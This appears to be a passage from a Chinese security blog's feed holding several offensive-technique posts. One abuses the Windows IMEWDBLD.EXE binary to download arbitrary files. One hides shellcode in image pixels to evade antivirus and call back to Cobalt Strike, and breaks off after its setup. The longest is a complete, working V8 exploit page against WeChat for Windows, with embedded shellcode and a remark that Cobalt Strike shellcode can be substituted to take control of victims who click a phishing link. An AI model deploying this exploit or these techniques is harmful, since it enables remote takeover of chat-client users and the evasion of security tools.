752a6d0f48a9ad00dc3886eff494b929fe89fd3f3e1cdf150332b07b930fd0cc120e753730a276b8b66695b82ac1b48292297bfb186642f196ee9e4dc2b54db15c9a571e001667bd38c11119be9ee52a80ecaec6bf9773b973922cb117cd76d51ed5ac18e</script>
</div>
<script src="/lib/blog-encrypt.js"></script><link href="/css/blog-encrypt.css" rel="stylesheet" type="text/css">]]></content>
</entry>
<entry>
<title>通过Windows自带程序IMEWDBLD.EXE下载任意文件</title>
<url>/2021/04/20/%E9%80%9A%E8%BF%87Windows%E8%87%AA%E5%B8%A6%E7%A8%8B%E5%BA%8FIMEWDBLD.EXE%E4%B8%8B%E8%BD%BD%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6/</url>
<content><![CDATA[<p>本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。</p>
<div style="text-align: right"> 小维</div>
<figure class="highlight yaml"><table><tr><td class="code"><pre><span class="line"><span class="comment"># 环境介绍</span></span><br><span class="line"><span class="string">OS</span> <span class="string">名称:</span> <span class="string">Microsoft</span> <span class="string">Windows</span> <span class="number">10</span> <span class="string">专业版</span></span><br><span class="line"><span class="string">OS</span> <span class="string">版本:</span> <span class="number">10.0</span><span class="number">.18363</span> <span class="string">暂缺</span> <span class="string">Build</span> <span class="number">18363</span></span><br></pre></td></tr></table></figure>
<a id="more"></a>
<figure class="highlight powershell"><table><tr><td class="code"><pre><span class="line"><span class="comment">#通过HTTP服务托管载荷(这里使用了python3起个简易的HTTP服务)</span></span><br><span class="line">python3 <span class="literal">-m</span> http.server</span><br><span class="line"></span><br><span class="line"><span class="comment">#通过IMEWDBLD.EXE下载任意文件</span></span><br><span class="line">C:\Windows\System32\IME\SHARED\IMEWDBLD.EXE http://<span class="number">10.200</span>.<span class="number">73.104</span>/download.txt</span><br><span class="line"></span><br><span class="line"><span class="comment">#查找文件存储路径</span></span><br><span class="line">forfiles /P <span class="string">"%localappdata%\Microsoft\Windows\INetCache"</span> /S /M * /C <span class="string">"cmd /c echo @path"</span></span><br><span class="line"><span class="comment">#参数介绍</span></span><br><span class="line">/P 表示开始搜索的路径。默认文件夹是当前工作的 目录 (.)。</span><br><span class="line">/S 指导 forfiles 递归到子目录。像 <span class="string">"DIR /S"</span>。</span><br><span class="line">/M 根据搜索掩码搜索文件。默认搜索掩码是 <span class="string">'*'</span>。</span><br><span class="line">/C 表示为每个文件执行的命令。命令字符串应该用双引号括起来。</span><br><span class="line"> @path 返回文件的完整路径。</span><br></pre></td></tr></table></figure>
<p><img src="/img/%E9%80%9A%E8%BF%87Windows%E8%87%AA%E5%B8%A6%E7%A8%8B%E5%BA%8FIMEWDBLD.EXE%E4%B8%8B%E8%BD%BD%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6/image-20210420130233187.png" alt="image-20210420133444561"></p>
]]></content>
</entry>
<entry>
<title>Wechat RCE 0day</title>
<url>/2021/04/18/Wechat-RCE-0day/</url>
<content><![CDATA[<p>本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。</p>
<div style="text-align: right"> 小维</div>
<h4 id="漏洞描述"><a href="#漏洞描述" class="headerlink" title="漏洞描述"></a>漏洞描述</h4><p>该漏洞是Google V8引擎历史漏洞的衍生关联漏洞。微信客户端(Windows版本)使用V8引擎解析JavaScript代码,并关闭了沙盒模式(–no-sandbox参数)。攻击者利用上述漏洞,构造恶意钓鱼链接并通过微信发送,在引诱受害者使用微信客户端(Windows版)点击钓鱼链接后,可获取远程主机的控制权限,实现远程代码执行攻击。</p>
<h4 id="影响范围"><a href="#影响范围" class="headerlink" title="影响范围"></a>影响范围</h4><p>微信PC客户端(Windows)< 3.2.1.141 (注:亲测较低版本可能不存在)</p>
<a id="more"></a>
<h4 id="漏洞复现"><a href="#漏洞复现" class="headerlink" title="漏洞复现"></a>漏洞复现</h4><h5 id="环境介绍"><a href="#环境介绍" class="headerlink" title="环境介绍"></a>环境介绍</h5><figure class="highlight angelscript"><table><tr><td class="code"><pre><span class="line">操作系统:Windows <span class="number">10</span></span><br><span class="line">Wechat:<span class="number">3.1</span><span class="number">.0</span><span class="number">.41</span></span><br></pre></td></tr></table></figure>
<p>微信打开链接时会调用WeChatWeb.exe进程,默认使用–no-sandbox,构造好对应的POC即可实现攻击。</p>
<p><img src="/img/Wechat-RCE-0day/image-20210417130306791.png" alt="image-20210417130306791"></p>
<h5 id="exp-html"><a href="#exp-html" class="headerlink" title="exp.html"></a>exp.html</h5><figure class="highlight javascript"><table><tr><td class="code"><pre><span class="line"><script></span><br><span class="line">ENABLE_LOG = <span class="literal">true</span>;</span><br><span class="line">IN_WORKER = <span class="literal">true</span>;</span><br><span class="line"></span><br><span class="line"><span class="comment">// calc.exe shellcode msf生成calc.exe shellcode命令msfvenom -a x86 –platform windows -p windows/exec cmd=calc.exe -e x86/alpha_mixed -f c</span></span><br><span class="line"><span class="keyword">var</span> shellcode = [<span class="number">0x89</span>,<span class="number">0xe0</span>,<span class="number">0xdb</span>,<span class="number">0xc0</span>,<span class="number">0xd9</span>,<span class="number">0x70</span>,<span class="number">0xf4</span>,<span class="number">0x5f</span>,<span class="number">0x57</span>,<span class="number">0x59</span>,<span class="number">0x49</span>,<span class="number">0x49</span>,<span class="number">0x49</span>,<span class="number">0x49</span>,<span class="number">0x49</span>,<span class="number">0x49</span>,<span class="number">0x49</span>,<span class="number">0x49</span>,<span class="number">0x49</span>,<span class="number">0x49</span>,<span class="number">0x43</span>,<span class="number">0x43</span>,<span class="number">0x43</span>,<span class="number">0x43</span>,<span class="number">0x43</span>,<span class="number">0x43</span>,<span class="number">0x37</span>,<span class="number">0x51</span>,<span class="number">0x5a</span>,<span class="number">0x6a</span>,<span class="number">0x41</span>,<span class="number">0x58</span>,<span class="number">0x50</span>,<span class="number">0x30</span>,<span class="number">0x41</span>,<span class="number">0x30</span>,<span class="number">0x41</span>,<span class="number">0x6b</span>,<span class="number">0x41</span>,<span class="number">0x41</span>,<span class="number">0x51</span>,<span class="number">0x32</span>,<span class="number">0x41</span>,<span class="number">0x42</span>,<span class="number">0x32</span>,<span class="number">0x42</span>,<span class="number">0x42</span>,<span class="number">0x30</span>,<span class="number">0x42</span>,<span class="number">0x42</span>,<span class="number">0x41</span>,<span class="number">0x42</span>,<span class="number">0x58</span>,<span class="number">0x50</span>,<span class="number">0x38</span>,<span class="number">0x41</span>,<span class="number">0x42</span>,<span class="number">0x75</span>,<span class="number">0x4a</span>,<span class="number">0x49</span>,<span class="number">0x79</span>,<span class="number">0x6c</span>,<span class="number">0x7a</span>,<span class="number">0x48</span>,<span class="number">0x6d</span>,<span class="number">0x52</span>,<span class="number">0x53</span>,<span class="number">0x30</span>,<span class="number">0x63</span>,<span class="number">0x30</span>,<span class="number">0x65</span>,<span class="number">0x50</span>,<span class="number">0x53</span>,<span class="number">0x50</span>,<span class="number">0x6f</span>,<span class="number">0x79</span>,<span class="number">0x49</span>,<span class="number">0x75</span>,<span class="number">0x50</span>,<span class="number">0x31</span>,<span class="number">0x6b</span>,<span class="number">0x70</span>,<span class="number">0x70</span>,<span class="number">0x64</span>,<span class="number">0x4c</span>,<span class="number">0x4b</span>,<span class="number">0x30</span>,<span class="number">0x50</span>,<span class="number">0x46</span>,<span class="number">0x50</span>,<span class="number">0x6c</span>,<span class="number">0x4b</span>,<span class="number">0x52</span>,<span class="number">0x72</span>,<span class="number">0x54</span>,<span class="number">0x4c</span>,<span class="number">0x6c</span>,<span class="number">0x4b</span>,<span class="number">0x46</span>,<span class="number">0x32</span>,<span class="number">0x34</span>,<span class="number">0x54</span>,<span class="number">0x4e</span>,<span class="number">0x6b</span>,<span class="number">0x30</span>,<span class="number">0x72</span>,<span class="number">0x76</span>,<span class="number">0x48</span>,<span class="number">0x36</span>,<span class="number">0x6f</span>,<span class="number">0x78</span>,<span class="number">0x37</span>,<span class="number">0x51</span>,<span class="number">0x5a</span>,<span class="number">0x47</span>,<span class="number">0x56</span>,<span class="number">0x55</span>,<span class="number">0x61</span>,<span class="number">0x69</span>,<span class="number">0x6f</span>,<span class="number">0x6e</span>,<span class="number">0x4c</span>,<span class="number">0x35</span>,<span class="number">0x6c</span>,<span class="number">0x53</span>,<span class="number">0x51</span>,<span class="number">0x33</span>,<span class="number">0x4c</span>,<span class="number">0x75</span>,<span class="number">0x52</span>,<span class="number">0x36</span>,<span class="number">0x4c</span>,<span class="number">0x75</span>,<span class="number">0x70</span>,<span class="number">0x7a</span>,<span class="number">0x61</span>,<span class="number">0x78</span>,<span class="number">0x4f</span>,<span class="number">0x44</span>,<span class="number">0x4d</span>,<span class="number">0x37</span>,<span class="number">0x71</span>,<span class="number">0x5a</span>,<span class="number">0x67</span>,<span class="number">0x69</span>,<span class="number">0x72</span>,<span class="number">0x79</span>,<span class="number">0x62</span>,<span class="number">0x43</span>,<span class="number">0x62</span>,<span class="number">0x56</span>,<span class="number">0x37</span>,<span class="number">0x4e</span>,<span class="number">0x6b</span>,<span class="number">0x31</span>,<span class="number">0x42</span>,<span class="number">0x56</span>,<span class="number">0x70</span>,<span class="number">0x4c</span>,<span class="number">0x4b</span>,<span class="number">0x61</span>,<span class="number">0x5a</span>,<span class="number">0x67</span>,<span class="number">0x4c</span>,<span class="number">0x6c</span>,<span class="number">0x4b</span>,<span class="number">0x30</span>,<span class="number">0x4c</span>,<span class="number">0x76</span>,<span class="number">0x71</span>,<span class="number">0x31</span>,<span class="number">0x68</span>,<span class="number">0x7a</span>,<span class="number">0x43</span>,<span class="number">0x51</span>,<span class="number">0x58</span>,<span class="number">0x57</span>,<span class="number">0x71</span>,<span class="number">0x5a</span>,<span class="number">0x71</span>,<span class="number">0x52</span>,<span class="number">0x71</span>,<span class="number">0x4e</span>,<span class="number">0x6b</span>,<span class="number">0x33</span>,<span class="number">0x69</span>,<span class="number">0x37</span>,<span class="number">0x50</span>,<span class="number">0x57</span>,<span class="number">0x71</span>,<span class="number">0x7a</span>,<span class="number">0x73</span>,<span class="number">0x6e</span>,<span class="number">0x6b</span>,<span class="number">0x70</span>,<span class="number">0x49</span>,<span class="number">0x55</span>,<span class="number">0x48</span>,<span class="number">0x6d</span>,<span class="number">0x33</span>,<span class="number">0x66</span>,<span class="number">0x5a</span>,<span class="number">0x31</span>,<span class="number">0x59</span>,<span class="number">0x6c</span>,<span class="number">0x4b</span>,<span class="number">0x54</span>,<span class="number">0x74</span>,<span class="number">0x4c</span>,<span class="number">0x4b</span>,<span class="number">0x57</span>,<span class="number">0x71</span>,<span class="number">0x4e</span>,<span class="number">0x36</span>,<span class="number">0x56</span>,<span class="number">0x51</span>,<span class="number">0x59</span>,<span class="number">0x6f</span>,<span class="number">0x6e</span>,<span class="number">0x4c</span>,<span class="number">0x6b</span>,<span class="number">0x71</span>,<span class="number">0x38</span>,<span class="number">0x4f</span>,<span class="number">0x64</span>,<span class="number">0x4d</span>,<span class="number">0x77</span>,<span class="number">0x71</span>,<span class="number">0x49</span>,<span class="number">0x57</span>,<span class="number">0x57</span>,<span class="number">0x48</span>,<span class="number">0x4d</span>,<span class="number">0x30</span>,<span class="number">0x70</span>,<span class="number">0x75</span>,<span class="number">0x68</span>,<span class="number">0x76</span>,<span class="number">0x47</span>,<span class="number">0x73</span>,<span class="number">0x73</span>,<span class="number">0x4d</span>,<span class="number">0x6b</span>,<span class="number">0x48</span>,<span class="number">0x67</span>,<span class="number">0x4b</span>,<span class="number">0x61</span>,<span class="number">0x6d</span>,<span class="number">0x66</span>,<span class="number">0x44</span>,<span class="number">0x61</span>,<span class="number">0x65</span>,<span class="number">0x78</span>,<span class="number">0x64</span>,<span class="number">0x30</span>,<span class="number">0x58</span>,<span class="number">0x6c</span>,<span class="number">0x4b</span>,<span class="number">0x63</span>,<span class="number">0x68</span>,<span class="number">0x56</span>,<span class="number">0x44</span>,<span class="number">0x43</span>,<span class="number">0x31</span>,<span class="number">0x6a</span>,<span class="number">0x73</span>,<span class="number">0x71</span>,<span class="number">0x76</span>,<span class="number">0x6c</span>,<span class="number">0x4b</span>,<span class="number">0x76</span>,<span class="number">0x6c</span>,<span class="number">0x62</span>,<span class="number">0x6b</span>,<span class="number">0x4e</span>,<span class="number">0x6b</span>,<span class="number">0x53</span>,<span class="number">0x68</span>,<span class="number">0x45</span>,<span class="number">0x4c</span>,<span class="number">0x37</span>,<span class="number">0x71</span>,<span class="number">0x59</span>,<span class="number">0x43</span>,<span class="number">0x4e</span>,<span class="number">0x6b</span>,<span class="number">0x36</span>,<span class="number">0x64</span>,<span class="number">0x4e</span>,<span class="number">0x6b</span>,<span class="number">0x55</span>,<span class="number">0x51</span>,<span class="number">0x38</span>,<span class="number">0x50</span>,<span class="number">0x4f</span>,<span class="number">0x79</span>,<span class="number">0x52</span>,<span class="number">0x64</span>,<span class="number">0x47</span>,<span class="number">0x54</span>,<span class="number">0x31</span>,<span class="number">0x34</span>,<span class="number">0x43</span>,<span class="number">0x6b</span>,<span class="number">0x51</span>,<span class="number">0x4b</span>,<span class="number">0x33</span>,<span class="number">0x51</span>,<span class="number">0x70</span>,<span class="number">0x59</span>,<span class="number">0x52</span>,<span class="number">0x7a</span>,<span class="number">0x70</span>,<span class="number">0x51</span>,<span class="number">0x49</span>,<span class="number">0x6f</span>,<span class="number">0x59</span>,<span class="number">0x70</span>,<span class="number">0x53</span>,<span class="number">0x6f</span>,<span class="number">0x51</span>,<span class="number">0x4f</span>,<span class="number">0x30</span>,<span class="number">0x5a</span>,<span class="number">0x4c</span>,<span class="number">0x4b</span>,<span class="number">0x37</span>,<span class="number">0x62</span>,<span class="number">0x38</span>,<span class="number">0x6b</span>,<span class="number">0x4c</span>,<span class="number">0x4d</span>,<span class="number">0x73</span>,<span class="number">0x6d</span>,<span class="number">0x63</span>,<span class="number">0x5a</span>,<span class="number">0x63</span>,<span class="number">0x31</span>,<span class="number">0x6c</span>,<span class="number">0x4d</span>,<span class="number">0x6d</span>,<span class="number">0x55</span>,<span class="number">0x68</span>,<span class="number">0x32</span>,<span class="number">0x57</span>,<span class="number">0x70</span>,<span class="number">0x67</span>,<span class="number">0x70</span>,<span class="number">0x37</span>,<span class="number">0x70</span>,<span class="number">0x36</span>,<span class="number">0x30</span>,<span class="number">0x50</span>,<span class="number">0x68</span>,<span class="number">0x55</span>,<span class="number">0x61</span>,<span class="number">0x6e</span>,<span class="number">0x6b</span>,<span class="number">0x62</span>,<span class="number">0x4f</span>,<span class="number">0x6e</span>,<span class="number">0x67</span>,<span class="number">0x4b</span>,<span class="number">0x4f</span>,<span class="number">0x79</span>,<span class="number">0x45</span>,<span class="number">0x4f</span>,<span class="number">0x4b</span>,<span class="number">0x5a</span>,<span class="number">0x50</span>,<span class="number">0x6c</span>,<span class="number">0x75</span>,<span class="number">0x4c</span>,<span class="number">0x62</span>,<span class="number">0x73</span>,<span class="number">0x66</span>,<span class="number">0x31</span>,<span class="number">0x78</span>,<span class="number">0x69</span>,<span class="number">0x36</span>,<span class="number">0x7a</span>,<span class="number">0x35</span>,<span class="number">0x4d</span>,<span class="number">0x6d</span>,<span class="number">0x6d</span>,<span class="number">0x4d</span>,<span class="number">0x4b</span>,<span class="number">0x4f</span>,<span class="number">0x78</span>,<span class="number">0x55</span>,<span class="number">0x67</span>,<span class="number">0x4c</span>,<span class="number">0x55</span>,<span class="number">0x56</span>,<span class="number">0x63</span>,<span class="number">0x4c</span>,<span class="number">0x37</span>,<span class="number">0x7a</span>,<span class="number">0x4b</span>,<span class="number">0x30</span>,<span class="number">0x69</span>,<span class="number">0x6b</span>,<span class="number">0x79</span>,<span class="number">0x70</span>,<span class="number">0x74</span>,<span class="number">0x35</span>,<span class="number">0x76</span>,<span class="number">0x65</span>,<span class="number">0x4d</span>,<span class="number">0x6b</span>,<span class="number">0x31</span>,<span class="number">0x57</span>,<span class="number">0x52</span>,<span class="number">0x33</span>,<span class="number">0x43</span>,<span class="number">0x42</span>,<span class="number">0x42</span>,<span class="number">0x4f</span>,<span class="number">0x71</span>,<span class="number">0x7a</span>,<span class="number">0x75</span>,<span class="number">0x50</span>,<span class="number">0x50</span>,<span class="number">0x53</span>,<span class="number">0x39</span>,<span class="number">0x6f</span>,<span class="number">0x48</span>,<span class="number">0x55</span>,<span class="number">0x65</span>,<span class="number">0x33</span>,<span class="number">0x30</span>,<span class="number">0x61</span>,<span class="number">0x52</span>,<span class="number">0x4c</span>,<span class="number">0x51</span>,<span class="number">0x73</span>,<span class="number">0x74</span>,<span class="number">0x6e</span>,<span class="number">0x70</span>,<span class="number">0x65</span>,<span class="number">0x50</span>,<span class="number">0x78</span>,<span class="number">0x63</span>,<span class="number">0x55</span>,<span class="number">0x73</span>,<span class="number">0x30</span>,<span class="number">0x41</span>,<span class="number">0x41</span>];</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">print</span>(<span class="params">data</span>) </span>{</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">var</span> not_optimised_out = <span class="number">0</span>;</span><br><span class="line"><span class="keyword">var</span> target_function = (<span class="function"><span class="keyword">function</span> (<span class="params">value</span>) </span>{</span><br><span class="line"> <span class="keyword">if</span> (value == <span class="number">0xdecaf0</span>) {</span><br><span class="line"> not_optimised_out += <span class="number">1</span>;</span><br><span class="line"> }</span><br><span class="line"> not_optimised_out += <span class="number">1</span>;</span><br><span class="line"> not_optimised_out |= <span class="number">0xff</span>;</span><br><span class="line"> not_optimised_out *= <span class="number">12</span>;</span><br><span class="line">});</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> (<span class="keyword">var</span> i = <span class="number">0</span>; i < <span class="number">0x10000</span>; ++i) {</span><br><span class="line"> target_function(i);</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">var</span> g_array;</span><br><span class="line"><span class="keyword">var</span> tDerivedNCount = <span class="number">17</span> * <span class="number">87481</span> - <span class="number">8</span>;</span><br><span class="line"><span class="keyword">var</span> tDerivedNDepth = <span class="number">19</span> * <span class="number">19</span>;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">cb</span>(<span class="params">flag</span>) </span>{</span><br><span class="line"> <span class="keyword">if</span> (flag == <span class="literal">true</span>) {</span><br><span class="line"> <span class="keyword">return</span>;</span><br><span class="line"> }</span><br><span class="line"> g_array = <span class="keyword">new</span> <span class="built_in">Array</span>(<span class="number">0</span>);</span><br><span class="line"> g_array[<span class="number">0</span>] = <span class="number">0x1dbabe</span> * <span class="number">2</span>;</span><br><span class="line"> <span class="keyword">return</span> <span class="string">'c01db33f'</span>;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">gc</span>(<span class="params"></span>) </span>{</span><br><span class="line"> <span class="keyword">for</span> (<span class="keyword">var</span> i = <span class="number">0</span>; i < <span class="number">0x10000</span>; ++i) {</span><br><span class="line"> <span class="keyword">new</span> <span class="built_in">String</span>();</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">oobAccess</span>(<span class="params"></span>) </span>{</span><br><span class="line"> <span class="keyword">var</span> this_ = <span class="keyword">this</span>;</span><br><span class="line"> <span class="keyword">this</span>.buffer = <span class="literal">null</span>;</span><br><span class="line"> <span class="keyword">this</span>.buffer_view = <span class="literal">null</span>;</span><br><span class="line"></span><br><span class="line"> <span class="keyword">this</span>.page_buffer = <span class="literal">null</span>;</span><br><span class="line"> <span class="keyword">this</span>.page_view = <span class="literal">null</span>;</span><br><span class="line"></span><br><span class="line"> <span class="keyword">this</span>.prevent_opt = [];</span><br><span class="line"></span><br><span class="line"> <span class="keyword">var</span> kSlotOffset = <span class="number">0x1f</span>;</span><br><span class="line"> <span class="keyword">var</span> kBackingStoreOffset = <span class="number">0xf</span>;</span><br><span class="line"></span><br><span class="line"> <span class="class"><span class="keyword">class</span> <span class="title">LeakArrayBuffer</span> <span class="keyword">extends</span> <span class="title">ArrayBuffer</span> </span>{</span><br><span class="line"> <span class="keyword">constructor</span>() {</span><br><span class="line"> <span class="keyword">super</span>(<span class="number">0x1000</span>);</span><br><span class="line"> <span class="keyword">this</span>.slot = <span class="keyword">this</span>;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">this</span>.page_buffer = <span class="keyword">new</span> LeakArrayBuffer();</span><br><span class="line"> <span class="keyword">this</span>.page_view = <span class="keyword">new</span> <span class="built_in">DataView</span>(<span class="keyword">this</span>.page_buffer);</span><br><span class="line"></span><br><span class="line"> <span class="keyword">new</span> <span class="built_in">RegExp</span>({ <span class="attr">toString</span>: <span class="function"><span class="keyword">function</span> (<span class="params"></span>) </span>{ <span class="keyword">return</span> <span class="string">'a'</span> } });</span><br><span class="line"> cb(<span class="literal">true</span>);</span><br><span class="line"></span><br><span class="line"> <span class="class"><span class="keyword">class</span> <span class="title">DerivedBase</span> <span class="keyword">extends</span> <span class="title">RegExp</span> </span>{</span><br><span class="line"> <span class="keyword">constructor</span>() {</span><br><span class="line"> <span class="comment">// var array = null;</span></span><br><span class="line"> <span class="keyword">super</span>(</span><br><span class="line"> <span class="comment">// at this point, the 4-byte allocation for the JSRegExp `this` object</span></span><br><span class="line"> <span class="comment">// has just happened.</span></span><br><span class="line"> {</span><br><span class="line"> toString: cb</span><br><span class="line"> }, <span class="string">'g'</span></span><br><span class="line"> <span class="comment">// now the runtime JSRegExp constructor is called, corrupting the</span></span><br><span class="line"> <span class="comment">// JSArray.</span></span><br><span class="line"> );</span><br><span class="line"></span><br><span class="line"> <span class="comment">// this allocation will now directly follow the FixedArray allocation</span></span><br><span class="line"> <span class="comment">// made for `this.data`, which is where `array.elements` points to.</span></span><br><span class="line"> this_.buffer = <span class="keyword">new</span> <span class="built_in">ArrayBuffer</span>(<span class="number">0x80</span>);</span><br><span class="line"> g_array[<span class="number">8</span>] = this_.page_buffer;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="comment">// try{</span></span><br><span class="line"> <span class="keyword">var</span> derived_n = <span class="built_in">eval</span>(<span class="string">`(function derived_n(i) {</span></span><br><span class="line"><span class="string"> if (i == 0) {</span></span><br><span class="line"><span class="string"> return DerivedBase;</span></span><br><span class="line"><span class="string"> }</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> class DerivedN extends derived_n(i-1) {</span></span><br><span class="line"><span class="string"> constructor() {</span></span><br><span class="line"><span class="string"> super();</span></span><br><span class="line"><span class="string"> return;</span></span><br><span class="line"><span class="string"> <span class="subst">${<span class="string">"this.a=0;"</span>.repeat(tDerivedNCount)}</span></span></span><br><span class="line"><span class="string"> }</span></span><br><span class="line"><span class="string"> }</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> return DerivedN;</span></span><br><span class="line"><span class="string"> })`</span>);</span><br><span class="line"></span><br><span class="line"> gc();</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"> <span class="keyword">new</span> (derived_n(tDerivedNDepth))();</span><br><span class="line"></span><br><span class="line"> <span class="keyword">this</span>.buffer_view = <span class="keyword">new</span> <span class="built_in">DataView</span>(<span class="keyword">this</span>.buffer);</span><br><span class="line"> <span class="keyword">this</span>.leakPtr = <span class="function"><span class="keyword">function</span> (<span class="params">obj</span>) </span>{</span><br><span class="line"> <span class="keyword">this</span>.page_buffer.slot = obj;</span><br><span class="line"> <span class="keyword">return</span> <span class="keyword">this</span>.buffer_view.getUint32(kSlotOffset, <span class="literal">true</span>, ...this.prevent_opt);</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">this</span>.setPtr = <span class="function"><span class="keyword">function</span> (<span class="params">addr</span>) </span>{</span><br><span class="line"> <span class="keyword">this</span>.buffer_view.setUint32(kBackingStoreOffset, addr, <span class="literal">true</span>, ...this.prevent_opt);</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">this</span>.read32 = <span class="function"><span class="keyword">function</span> (<span class="params">addr</span>) </span>{</span><br><span class="line"> <span class="keyword">this</span>.setPtr(addr);</span><br><span class="line"> <span class="keyword">return</span> <span class="keyword">this</span>.page_view.getUint32(<span class="number">0</span>, <span class="literal">true</span>, ...this.prevent_opt);</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">this</span>.write32 = <span class="function"><span class="keyword">function</span> (<span class="params">addr, value</span>) </span>{</span><br><span class="line"> <span class="keyword">this</span>.setPtr(addr);</span><br><span class="line"> <span class="keyword">this</span>.page_view.setUint32(<span class="number">0</span>, value, <span class="literal">true</span>, ...this.prevent_opt);</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">this</span>.write8 = <span class="function"><span class="keyword">function</span> (<span class="params">addr, value</span>) </span>{</span><br><span class="line"> <span class="keyword">this</span>.setPtr(addr);</span><br><span class="line"> <span class="keyword">this</span>.page_view.setUint8(<span class="number">0</span>, value, ...this.prevent_opt);</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">this</span>.setBytes = <span class="function"><span class="keyword">function</span> (<span class="params">addr, content</span>) </span>{</span><br><span class="line"> <span class="keyword">for</span> (<span class="keyword">var</span> i = <span class="number">0</span>; i < content.length; i++) {</span><br><span class="line"> <span class="keyword">this</span>.write8(addr + i, content[i]);</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">return</span> <span class="keyword">this</span>;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">trigger</span>(<span class="params"></span>) </span>{</span><br><span class="line"> <span class="keyword">var</span> oob = oobAccess();</span><br><span class="line"></span><br><span class="line"> <span class="keyword">var</span> func_ptr = oob.leakPtr(target_function);</span><br><span class="line"> print(<span class="string">'[*] target_function at 0x'</span> + func_ptr.toString(<span class="number">16</span>));</span><br><span class="line"></span><br><span class="line"> <span class="keyword">var</span> kCodeInsOffset = <span class="number">0x1b</span>;</span><br><span class="line"></span><br><span class="line"> <span class="keyword">var</span> code_addr = oob.read32(func_ptr + kCodeInsOffset);</span><br><span class="line"> print(<span class="string">'[*] code_addr at 0x'</span> + code_addr.toString(<span class="number">16</span>));</span><br><span class="line"></span><br><span class="line"> oob.setBytes(code_addr, shellcode);</span><br><span class="line"></span><br><span class="line"> target_function(<span class="number">0</span>);</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="keyword">try</span>{</span><br><span class="line"> print(<span class="string">"start running"</span>);</span><br><span class="line"> trigger();</span><br><span class="line">}<span class="keyword">catch</span>(e){</span><br><span class="line"> print(e);</span><br><span class="line">}</span><br><span class="line"><<span class="regexp">/script></span></span><br></pre></td></tr></table></figure>
<h5 id="效果"><a href="#效果" class="headerlink" title="效果"></a>效果</h5><p>将恶意的exp.html部署在HTTP服务上,使用微信内置浏览器打开部署好的链接,成功弹出计算器。</p>
<p><img src="/img/Wechat-RCE-0day/image-20210417114107973.png" alt="image-20210417114107973"></p>
<p>将exp.html中的计算器Shellcode替换成CS生成好的Shellcode(32位),实现CS上线。</p>
<p><img src="/img/Wechat-RCE-0day/image-20210417134219601.png" alt="image-20210417134219601"></p>
<h4 id="处置建议"><a href="#处置建议" class="headerlink" title="处置建议"></a>处置建议</h4><p>微信新版本修复该漏洞,建议用户立即将微信 (Windows版)更新至最新版本。</p>
<h4 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h4><p><a href="https://mp.weixin.qq.com/s/qAnxwM1Udulj1K3Wn2awVQ" target="_blank" rel="noopener">https://mp.weixin.qq.com/s/qAnxwM1Udulj1K3Wn2awVQ</a></p>
]]></content>
<tags>
<tag>Wechat</tag>
</tags>
</entry>
<entry>
<title>Shellcode 隐写像素RGB免杀上线到 CobaltStrike</title>
<url>/2021/04/16/Shellcode%20%E9%9A%90%E5%86%99%E5%83%8F%E7%B4%A0RGB%E5%85%8D%E6%9D%80%E4%B8%8A%E7%BA%BF%E5%88%B0%20CobaltStrike/</url>
<content><![CDATA[<p>本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。</p>
<div style="text-align: right"> 小维</div>
<h4 id="写在前面"><a href="#写在前面" class="headerlink" title="写在前面"></a>写在前面</h4><p>看到一篇推文隐写RGB来进行绕过杀软,记录一下~</p>
<a id="more"></a>
<h4 id="环境介绍"><a href="#环境介绍" class="headerlink" title="环境介绍"></a>环境介绍</h4><figure class="highlight angelscript"><table><tr><td class="code"><pre><span class="line">攻击机地址:<span class="number">10.10</span><span class="number">.10</span><span class="number">.2</span></span><br><span class="line">cobaltstrike v4<span class="number">.1</span></span><br><span class="line"></span><br><span class="line">VPS地址:*.*.*.*</span><br><span class="line"></span><br><span class="line">靶机系统: Windows <span class="number">10</span></span><br><span class="line">靶机地址: <span class="number">10.10</span><span class="number">.10</span><span class="number">.131</span></span><br></pre></td></tr></table></figure>
<h4 id="隐写RGB示例"><a href="#隐写RGB示例" class="headerlink" title="隐写RGB示例"></a>隐写RGB示例</h4><h5 id="Invoke-PSImage下载"><a href="#Invoke-PSImage下载" class="headerlink" title="Invoke-PSImage下载"></a>Invoke-PSImage下载</h5><figure class="highlight awk"><table><tr><td class="code"><pre><span class="line">下载地址: https:<span class="regexp">//gi</span>thub.com<span class="regexp">/dayuxiyou/</span>Invoke-PSImage</span><br></pre></td></tr></table></figure>
<p>Invoke-PSImage.ps1</p>
